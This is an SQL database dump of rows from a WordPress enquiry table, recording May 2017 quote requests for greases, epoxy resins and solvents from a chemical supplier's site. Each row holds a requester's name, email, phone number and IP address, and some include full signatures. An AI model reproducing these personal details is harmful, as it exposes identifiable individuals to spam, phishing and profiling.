INSERT INTO `wp_enquiry_detail_new` VALUES (893, 'William Walko', 'wwalko@mecanexusa.com', 'Please confirm:\n\n-price\n-lead time\n-if this ships with mfg cofc &amp; msds\n-Date of Mfg &amp; Date of expiration for product you are offering (or if you guarantee a specific shelf life %)\n-weight and dimensions\n-ECCN &amp; Schedule B if available', '860828-6531', 'MS-143TE', '12.197.28.228', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-02 12:51:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (894, 'Alexsey', 'kent21972@gmail.com', 'Syringe 0.5 oz 1 unit', '', 'Price', '94.50.192.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"847";s:5:"title";s:7:"GPL 224";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_95239273.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-02 14:29:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (895, 'Anand Rau', 'crosslinctech@windstream.net', 'Hello:\nI am developing an epoxy solution for a customer and we are in early prototyping stage.  I am seeking (a) Sample of curing agent W (b) pricing for 5 gallon quantity ; drum quantity.\nThank you', '402730-9694', 'Curing Agent W/ ', '71.29.250.48', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-02 15:06:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (896, 'Akira Muraoka', 'amuraoka@uct.com', 'Please send a price quote for Krytox FPG 182, 8 oz. tube.\n\nThank you.\nAkira', '510576-4324', ' Krytox FPG 182, 8 oz. tube', '12.71.43.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"973";s:5:"title";s:7:"FPG 182";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:81:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-fpg-128-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-02 20:59:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (897, 'Emma Delamarche', 'emma.delamarche@plasticomnium.com', 'Dear Sir or Madam,\n\nI am writing to ask how long it would take to send a few liters of EPON 828 to France (say 10-20L), and how much it would cost.\n\nBest regards,\n\nEmma', '', 'EPON 828', '46.235.153.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 07:49:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (898, 'Johnie Fore', 'jfore@jfti.com', 'Please provide pricing and delivery for the following.Vertrel SFR. ', '301862-2580', 'Request for Quote.', '65.213.199.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1276";s:5:"title";s:11:"Vertrel SFR";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-sfr.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 12:04:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (899, 'Tom Day', 'tom.day@spotprecision.com', 'Miller-Stephenson,\n\nPlease quote one (1) quart of MS-111 or advise if you have a distributor serving the San Diego, CA area.  We\'re in San Marcos, just north of San Diego.  Thanks!', '760585-5631', 'Quote for 1 qt MS-111', '107.135.67.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 16:31:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (900, 'Igor Immer', 'sales@irexport.ca', 'Dear Sir,\n\nPlease quote me 1 Cartridge (0.8 kg) of the Krytox GPL 206,\n\nThank you.\n\nIgor Immer', '514924-9073', 'REQUEST FOR QUOTE', '184.144.197.245', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 16:51:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (901, 'Daniel Grundman', 'daniel@flexfletch.com', 'Reaction injection molding of strips.  We mold strips to die cut into arrow vanes.  Need solution to silicone/wax/naptha we\'ve been using for 47 years.  Especially if there is no transfer to the part.  The end product is glued to an arrow shaft.', '651426-4882', 'Seeking Semi-Permanent Release agent', '24.131.130.69', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"400";s:5:"title";s:21:"ReleaSys 82 (Aerosol)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 19:02:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (902, 'Camelia', 'Borzcamelia@yahoo.ca', 'Im interested in package size (tubes or kegs), price and delivery in Canada.\n\nThanks!', '', 'Price', '209.52.88.242', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"824";s:5:"title";s:7:"GPL 217";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_149749874.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 19:04:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (903, 'Shimon Avrahami', 'info@gsidf.con', 'Please send me wholesale price for p/n MS-260-16OZ.\nPlease include shipping cost to NJ\n\nThanks,\nShimon Avrahami\nwww.gsidf.com', '718725-7117', 'RFQ', '108.50.219.244', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 19:25:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (904, 'Linas Gedgaudas', 'linas.gedgaudas@arcmachines.com', 'Please email quote 2 lbs.\nArc Machines, Inc.\n', '818686-1240', 'Krytox GPL205', '67.220.169.242', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 20:07:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (905, 'Adam', 'anguyen@greencircuits.net', 'to whom this might concern.\nplease advise if you could provide our company with a sample quantity for review and evaluation.\nthanks', '1408-799-1335', 'Sample Quantity Order', '74.7.240.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-03 22:27:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (906, 'Doyle Anderson', 'doyle.anderson@fci.com', 'Would like to test in a electical connector application to reduce wear.', '717938-7663', 'Quote, smallest volume', '72.25.0.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"707";s:5:"title";s:7:"XHT-500";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_326782289.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-04 09:37:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (907, 'Doyle Anderson', 'doyle.anderson@fci.com', 'I emailed a RFQ earlier looking for the XHT-500, I would also like a quote for the XHT-1000, along with a solvent to cut the oil to a 2-4% range. Small volumes at this stage for testing.\n\nThank You.', '', 'Quote Request', '72.25.0.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"708";s:5:"title";s:8:"XHT-1000";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_373999234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-04 09:43:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (908, 'Ryan Luxton', 'ryan@nuflowtech.com.au', 'Hi,\n\nCan I please have some pricing information on the EPIKURE™ Curing Agent 3271. \nFreight to Brisbane QLD, Australia\n\nThanks', '+61755971455', 'EPIKURE™ Curing Agent 3271', '120.29.18.156', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1189";s:5:"title";s:15:"EPIKURE™ 3271";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3271.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-05 05:08:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (909, 'Wai Tat KERK', 'wtkerk@SIMTech.a-star.edu.sg', 'Hi, I would like to order EPON 1001F resin.  May I have the quotation of 1kg packing?  How long is the delivery time? Thanks \nBest Regards,\nWai Tat', '', 'EPON 100F Quotation', '192.122.131.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"924";s:5:"title";s:13:"EPON™ 1001F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-05 06:23:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (910, 'Joanne Marsalisi', 'jmarsalisi@bmsbearing.com', 'Can you please give us a price for the minimum # of canisters of Krytox 226 we could buy?', '914428-2900', 'Krytox 226', '71.167.124.56', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-05 11:09:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (911, 'GARY KAPPEL', 'gary.kappel@corindus.com', 'Dear Sir / Madam,\n\nWhat do you recommend for molding Texin TPU and a sticking problem on a no draft surface\n\nThank you,\n\nGary Kappel\nPrincipal Engineer\nResearch and Development\n \nProtection and Precision. Delivered!\nP:  508-653-3335 X235\nC:  978-821-4234\ngary.kappel@corindus.com\nwww.corindus.com\n309 Waverley Oaks Road, Suite 105 | Waltham, MA | 02452\n\nThis message (including any attachments) is only for the use of the person(s) for whom it is intended. It may contain privileged, confidential ', '508653-3335', 'MS-122AV', '98.110.147.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-05 19:20:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (912, 'Brandon Pochinco', 'Brandon.Pochinco@standardaero.com', 'Hi,\n\nI am currently looking for an alternative to nPB for use in a vapor degreaser and came across your product. I was wondering if possible to get some more info on the product. What is the price per drum? Could I get the ARP 1755 test results? Is this compatible for aerospace and are there any customers currently using it? Could I get a full compatibility list of materials and is this product compatible with a Baron Blakeslee M-Line vapor degreaser?\n\nThanks,\n\nBrandon', '', 'SION product', '205.200.103.25', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-05 20:36:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (913, 'Richard Spencer', 'richardfspencer@comcast.net', 'Please give me pricing for 12 cans of MS-260 with shipping.\nThank you. Customer code 2758456.', '603424-3503', 'MS-260', '73.89.146.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-06 21:21:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (914, 'Steven Hershner', 'steve.hershner@tsc.com', 'Would like pricing on 1 quart of EPON Resin 828, EPON828-QT.\nAlso, would like pricing on 1 quart of Versamid 125 Resin. (if you have this also)\nAlso, would like pricing on 1 quart of PR-1564  (by PPG Aerospace) potting compound. (if you have this also)\nThank you.', '571302-7272', 'RFQ for Materials', '65.158.32.123', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-07 13:15:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (915, 'Carolyn parker', 'carolyn.parker@westengineering.com', 'Please quote price and delivery for a 5kg pail of Krytox GPL 226 grease.  We are located in Ashland, VA which is just north of Richmond, VA', '804798-3966', 'Krytox GPL 226 grease', '50.73.231.237', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 14:20:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (916, 'BJ Austin', 'bjaustin@inspacellc.com', 'Dear Sir/Madam,\nCan you please provide a quote with lead time on 2.5 gallons of Vertrel MCA?\nThank you.', '765775-2107', 'Quote on Vertrel MCA', '72.12.218.45', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 15:03:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (917, 'mary', 'po@jeximinc.com', 'Please provide a quote with PRICE, LT, MFR, MFR T/R, MFR COC and MFR QPL.  Thank you very much.  Mary', '', 'RFQ: CHK0508-77 REF: SCOTT', '216.14.13.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 16:02:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (918, 'Morrie Waldon', 'cwaldon53@yahoo.com', 'Can I have a price and where I can purchase it.', '510427-1150', 'Epoxy 907 two-handed adhesive', '108.226.118.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 16:39:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (919, 'Ralph Coppen', 'rcoppen@southwestturbine.com', 'please quote 2 each 8oz. tubes  GPL-48Y\nplease verify that Southwest Turbine Inc. still has an active account with you.\nthanks,\n\n', '602278-7442', 'Krytox vacuum grease', '98.190.155.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"862";s:5:"title";s:3:"LVP";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_22381852.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 16:45:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (920, 'Jody Seeling', 'seeling@frib.msu.edu', 'I need to purchase this using a  credit card', '517908-7770', '', '35.9.58.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 18:48:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (921, 'Danielle Kottas', 'dkottas@lincolnstructural.com', 'I am looking for 3 cartridges of Krytox GPL-204 Grease.  Can you please provide me price and lead time. \n\nThanks\nDanielle', '402952-4401', 'Krytox Grease Flourinated GPL-204', '70.167.225.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"788";s:5:"title";s:7:"GPL 204";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_399075487.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-08 22:36:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (922, 'T Yuan', 'Tyuan1152@gmail.com', 'Hello, my company is interested in trying your vazo 52 for the polymerization of our acrylic. When it\'s convienant, please send us product information and pricing. Thank you very much.', '', 'Vazo 52', '117.80.74.168', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 06:23:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (923, 'Sam Martella', 'smartella@trstechnologies.com', 'Hi, I would like pricing information on the following:\nOne bottle, "I think app 24oz" Epon 828 resin\nOne bottle Epicure 3140 hardner same size\nOne small bottle Ricca 10% sodium hydroxide\n\nMany thanks', '814238-7485', 'Price quote', '173.163.21.29', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1868";s:5:"title";s:15:"EPIKURE™ 3140";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 12:40:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (924, 'Dan Rich', 'drich@waterandair.com', 'I need to get pricing for some of the above lube.', '352372-1500', 'Krytox GPL 205', '209.251.128.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 17:03:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (925, 'Richard Hu', 'richard.hu@conavi.com', 'Requesting certificate/documentation regarding\n- effect of Sterilization, E-beam in particular.\n- Bio compatibility certificate\n- Carcinogenicity white paper\n- Possible sample request', '416483-0100', 'Tribosys Fluorinated Synthetic Lubricants', '70.28.25.229', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 17:05:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (926, 'Jordan Gutshall', 'j.gutshall@sae.edu', 'Looking to purchase about 3 of this product to use to clean audio consoles. ', '814251-3023', '', '206.252.217.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2800";s:5:"title";s:23:"MS-730L Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_486488371.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 18:47:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (927, 'Deb Grant', 'deb@peakbeam.com', 'Hi!  I was wondering if your MS-465C is ROHS-compliant or not.  Thanks!', '610353-8505', 'looking for ROHS info on MS-465C', '173.15.168.121', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:7:"MS-465C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 19:19:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (928, 'DONALD CONKLIN', 'DCONKLIN@AERWORLDWIDE.COM', 'need to order', '510933-0500', 'looking for the gallon bottle', '50.226.20.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-09 20:37:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (929, 'Sam Kom', 'SKOM@AMPHENOLRF.COM', 'Please quote for the following. Need asap', '203796-2089', '', '107.0.71.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-10 12:46:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (930, 'Ken Harris', 'kenneth.harris@motioncanada.com', 'Good Day\nIs Motion Canada setup to purchase through you folks? If so, please provide minimum ordering info with pricing?\n\nThanks\nKen ', '506859-4345', 'Price and availabilty', '184.150.236.67', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"822";s:5:"title";s:7:"GPL 215";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_60848668.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-10 14:18:11', '', NULL, '', '', '', NULL, '', ''); 
